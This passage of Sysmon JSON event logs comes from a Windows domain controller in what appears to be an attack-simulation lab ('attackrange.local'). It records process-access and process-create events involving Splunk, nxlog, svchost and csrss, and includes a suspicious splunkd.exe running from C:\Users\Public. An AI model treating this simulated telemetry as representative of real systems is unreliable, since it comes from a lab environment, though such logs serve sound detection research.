C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010A9850500}","TargetProcessId":"3288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.415\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.415","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.478\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010A9850500}\r\nSourceProcessId: 3288\r\nSourceThreadId: 2812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.478","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010A9850500}","SourceProcessId":"3288","SourceThreadId":"2812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.494\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.494","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.533\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nProcessId: 92\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.533","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nTargetProcessId: 92\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","TargetProcessId":"92","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nTargetProcessId: 92\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","TargetProcessId":"92","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
